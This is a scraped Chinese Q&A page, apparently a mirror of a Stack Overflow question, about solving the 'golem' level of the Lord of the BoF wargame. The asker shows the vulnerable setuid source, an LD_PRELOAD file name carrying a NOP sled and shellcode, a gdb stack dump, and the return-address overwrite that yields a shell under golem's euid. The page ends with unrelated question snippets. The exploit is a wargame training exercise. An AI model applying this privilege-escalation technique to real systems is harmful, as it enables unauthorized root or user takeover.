个人中心
文章发布
退出
作者热门文章
- android - 多次调用 OnPrimaryClipChangedListener
- android - 无法更新 RecyclerView 中的 TextView 字段
- android.database.CursorIndexOutOfBoundsException : Index 0 requested, 光标大小为 0
- android - 使用 AppCompat 时,我们是否需要明确指定其 UI 组件(Spinner、EditText)颜色
25
4
首先,让我告诉你上下文。我正在解决名为 The lord of the BoF 的兵棋问题,该兵棋基于 RedHat Linux 6.2,没有 地址空间布局随机化(ASLR), NX bit, ASCII armor 等。而gcc 没有做任何编译代码时虚拟。当我试图解决名为 golem 的问题时,我想知道一些事情。
这是傀儡的源代码。如您所见,它用 0 填充整个堆栈,main 的返回地址除外。
login: skeleton
Password:
unknown terminal "xterm-256color"
[skeleton@localhost skeleton]$ bash2
unknown terminal "xterm-256color"
[skeleton@localhost skeleton]$ ls
golem golem.c
[skeleton@localhost skeleton]$ cat golem.c
/*
The Lord of the BOF : The Fellowship of the BOF
- golem
- stack destroyer
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer!
memset(buffer, 0, 44);
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
}
golem 是具有setuid 的可执行文件。
[skeleton@localhost skeleton]$ ls -l .
total 16
-rwsr-sr-x 1 golem golem 12199 Mar 2 2010 golem
-rw-r--r-- 1 root root 539 Mar 29 2010 golem.c
我创建了一个空的共享库,其名称包含 shellcode,并使用文件的绝对路径设置环境变量 LD_PRELOAD。
[skeleton@localhost skeleton]$ echo "" > so.c
[skeleton@localhost skeleton]$ gcc so.c -fPIC -shared -o `python -c "print '\x90'*200+'...(Shellcode)...'+'.so'"`
[skeleton@localhost skeleton]$ export LD_PRELOAD=`pwd`/`python -c "print '\x90'*200+'...(Shellcode)...'+'.so'"`
然后我复制了 golem 以便用 gdb 调试它。我调试了它,在 $ebp-1264(0xbffff6b8)。
[skeleton@localhost skeleton]$ cp ./golem /tmp/em
[skeleton@localhost skeleton]$ gdb -q /tmp/em
(gdb) b *main+3
Breakpoint 1 at 0x8048473
(gdb) r
Starting program: /tmp/em
Breakpoint 1, 0x8048473 in main ()
(gdb) x/50x $ebp-5000
0xbfffe820: 0x00000267 0x00000000 0x000003f0 0x000006db
...
(gdb)
0xbfffe8e8: 0x00000358 0x000003ac 0x0000058d 0x0000070d
...
(gdb)
0xbfffe9b0: 0x00000318 0x000006cb 0x000006e3 0x0000046b
...
(gdb)
0xbfffea78: 0x000004fa 0x00000570 0x000006b4 0x00000000
...
(gdb)
0xbfffeb40: 0x00000242 0x000006e7 0x000005a0 0x000005fa
...
(gdb)
0xbfffec08: 0x00000404 0x00000648 0x00000577 0x000002ec
...
(gdb)
0xbfffecd0: 0x00000000 0x00000000 0x000003a2 0x0000026c
...
(gdb)
0xbfffed98: 0x0000009c 0x000005fc 0x000001c2 0x00000563
...
(gdb)
0xbfffee60: 0x00000000 0x000004d9 0x000006c9 0x00000277
...
(gdb)
0xbfffef28: 0x000005f6 0x00000551 0x000000b6 0x00000000
...
(gdb)
0xbfffeff0: 0x000003a4 0x00000351 0x000006cd 0x000000b9
...
(gdb)
0xbffff0b8: 0x0000045f 0x000006dd 0x000004a6 0x00000000
...
(gdb)
0xbffff180: 0x000001c0 0x000005f1 0x00000457 0x00000712
...
(gdb)
0xbffff248: 0x0000070b 0x00000167 0x00000555 0x00000619
...
(gdb)
0xbffff310: 0x000004aa 0x000006be 0x000003ef 0x00000000
...
(gdb)
0xbffff3d8: 0x0000062e 0x00000569 0x00000000 0x000005a1
...
(gdb)
0xbffff4a0: 0xbfffe3cc 0xbfffe39c 0xbfffe414 0x00001000
...
(gdb)
0xbffff568: 0x40013c00 0x00000004 0x40014ba0 0x00000003
...
(gdb)
0xbffff630: 0x40013c00 0x4001a0d4 0x40010c9e 0x40000814
0xbffff640: 0x400138d4 0x40001402 0x400002f4 0x080482d0
0xbffff650: 0x080482d0 0xbffff69c 0x00000002 0x40023fd0
0xbffff660: 0x40013c00 0x4000ba15 0x40013868 0x40000814
0xbffff670: 0x400041b0 0x00000001 0xbffff684 0x40001528
0xbffff680: 0x000002c8 0x00000000 0x080482d0 0x00000000
0xbffff690: 0x00000001 0x40000824 0xbffff6a4 0x400075bb
0xbffff6a0: 0x40017000 0x00002fb2 0x40013868 0xbffff8e4
0xbffff6b0: 0x4000380e 0x400144d8 0x6d6f682f 0x6b732f65
0xbffff6c0: 0x74656c65 0x902f6e6f 0x90909090 0x90909090
0xbffff6d0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff6e0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff6f0: 0x90909090 0x90909090
(gdb)
0xbffff6f8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff708: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff718: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff728: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff738: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff748: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff758: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff768: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff778: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff788: 0x90909090 0x31909090 0x616850c0 0x68687361
0xbffff798: 0x6e696261 0x4e243480 0x04247480 0x2474804e
0xbffff7a8: 0xe3894e05 0xe1895350 0x0bb0d231 0x732e80cd
0xbffff7b8: 0x4000006f 0x40013868
(gdb) x/s 0xbffff6c8
0xbffff6c8: '\220' <repeats 199 times>, "1"...
(gdb) x/s 0xbffff6c7
0xbffff6c7: '\220' <repeats 200 times>...
(gdb) x/s 0xbffff6c7
0xbffff6c7: '\220' <repeats 200 times>...
(gdb)
0xbffff78f: "1�Phaashhabin\2004$N\200t$\004N\200t$\005N\211�PS\211�1Ұ\013�\200.so"
(gdb) q
The program is running. Exit anyway? (y or n) y
我用 shellcode 的预期地址覆盖了 main 的返回地址,这样 shellcode 就可以用 setuid 执行,而且它起作用了。
[skeleton@localhost skeleton]$ /tmp/em `python -c "print 'A'*44+'\x40\xf7\xff\xbf'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@���
bash$ id
uid=510(skeleton) gid=510(skeleton) groups=510(skeleton)
bash$ exit
exit
[skeleton@localhost skeleton]$ ./golem `python -c "print 'A'*44+'\x40\xf7\xff\xbf'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@���
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$ exit
exit
[skeleton@localhost skeleton]$ exit
...
为什么在环境变量 LD_PRELOAD 中指定的共享库文件路径 string 加载到具有 setuid 的可执行文件的内存中>? I was told that LD_PRELOAD cannot be used with setuid .
golem,但它与我要问的完全不同。)最佳答案
在 Linux 上,通过 main() 的特殊第三个参数传统上称为 envp 的程序可以看到所有环境变量:http://crasseux.com/books/ctutorial/Environment-variables.html
如果 envp 是您的 main() 签名的一部分,它将指向一个包含所有环境变量的数组。即使不是,数组可能仍然存在于程序的地址空间中也是有道理的。
这并不意味着加载器在任何特定场景中实际上都遵循 LD_PRELOAD——它可以随意忽略它,例如在 setuid 下,但变量仍然存在。
关于linux - 为什么 `LD_PRELOAD`中指定的字符串加载到RedHat 6.2的setuid可执行文件的内存中?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/41864659/
25
4
0
我在具有 2CPU 和 3.75GB 内存 (https://aws.amazon.com/ec2/instance-types/) 的 c3.large Amazon EC2 ubuntu 机器上运
我想通过用户空间中的mmap-ing并将地址发送到内核空间从用户空间写入VGA内存(视频内存,而不是缓冲区),我将使用pfn remap将这些mmap-ed地址映射到vga内存(我将通过 lspci
在 Mathematica 中,如果你想让一个函数记住它的值,它在语法上是很轻松的。例如,这是标准示例 - 斐波那契: fib[1] = 1 fib[2] = 1 fib[n_]:= fib[n] =
我读到动态内存是在运行时在堆上分配的,而静态内存是在编译时在堆栈上分配的,因为编译器知道在编译时必须分配多少内存。 考虑以下代码: int n; cin>>n; int a[n]; 如果仅在运行期间读
我是 Python 的新手,但我之前还不知道这一点。我在 for 循环中有一个基本程序,它从站点请求数据并将其保存到文本文件但是当我检查我的任务管理器时,我发现内存使用量只增加了?长时间运行时,这对我
我正在设计一组数学函数并在 CPU 和 GPU(使用 CUDA)版本中实现它们。 其中一些函数基于查找表。大多数表占用 4KB,其中一些占用更多。基于查找表的函数接受一个输入,选择查找表的一两个条目,
读入一个文件,内存被动态分配给一个字符串,文件内容将被放置在这里。这是在函数内部完成的,字符串作为 char **str 传递。 使用 gdb 我发现在行 **(str+i) = fgetc(aFil
我需要证实一个理论。我正在学习 JSP/Java。 在查看了一个现有的应用程序(我没有写)之后,我注意到一些我认为导致我们的性能问题的东西。或者至少是其中的一部分。 它是这样工作的: 1)用户打开搜索
n我想使用memoization缓存某些昂贵操作的结果,这样就不会一遍又一遍地计算它们。 两个memoise和 R.cache适合我的需要。但是,我发现缓存在调用之间并不可靠。 这是一个演示我看到的问
我目前正在分析一些 javascript shell 代码。这是该脚本中的一行: function having() { memory = memory; setTimeout("F0
我有一种情况,我想一次查询数据库,然后再将整个数据缓存在内存中。 我得到了内存中 Elasticsearch 的建议,我用谷歌搜索了它是什么,以及如何在自己的 spring boot 应用程序中实现它
我正在研究 Project Euler (http://projecteuler.net/problem=14) 的第 14 题。我正在尝试使用内存功能,以便将给定数字的序列长度保存为部分结果。我正在
所以,我一直在做 Java 内存/注意力游戏作业。我还没有达到我想要的程度,它只完成了一半,但我确实让 GUI 大部分工作了......直到我尝试向我的框架添加单选按钮。我认为问题可能是因为我将 JF
我一直在尝试使用 Flask-Cache 的 memoize 功能来仅返回 statusTS() 的缓存结果,除非在另一个请求中满足特定条件,然后删除缓存。 但它并没有被删除,并且 Jinja 模板仍
我对如何使用 & 运算符来减少内存感到非常困惑。 我可以回答下面的问题吗? clase C{ function B(&$a){ $this->a = &$a; $thi
在编写代码时,我遇到了一个有趣的问题。 我有一个 PersonPOJO,其 name 作为其 String 成员之一及其 getter 和 setter class PersonPOJO { priv
在此代码中 public class Base { int length, breadth, height; Base(int l, int b, int h) { l
Definition Structure padding is the process of aligning data members of the structure in accordance
在 JavaScript Ninja 的 secret 中,作者提出了以下方案,用于在没有闭包的情况下内存函数结果。他们通过利用函数是对象这一事实并在函数上定义一个属性来存储过去调用函数的结果来实现这
我正在尝试找出 map 消耗的 RAM 量。所以,我做了以下事情;- Map cr = crPair.collectAsMap(); // 200+ entries System.out.printl
我是一名优秀的程序员,十分优秀!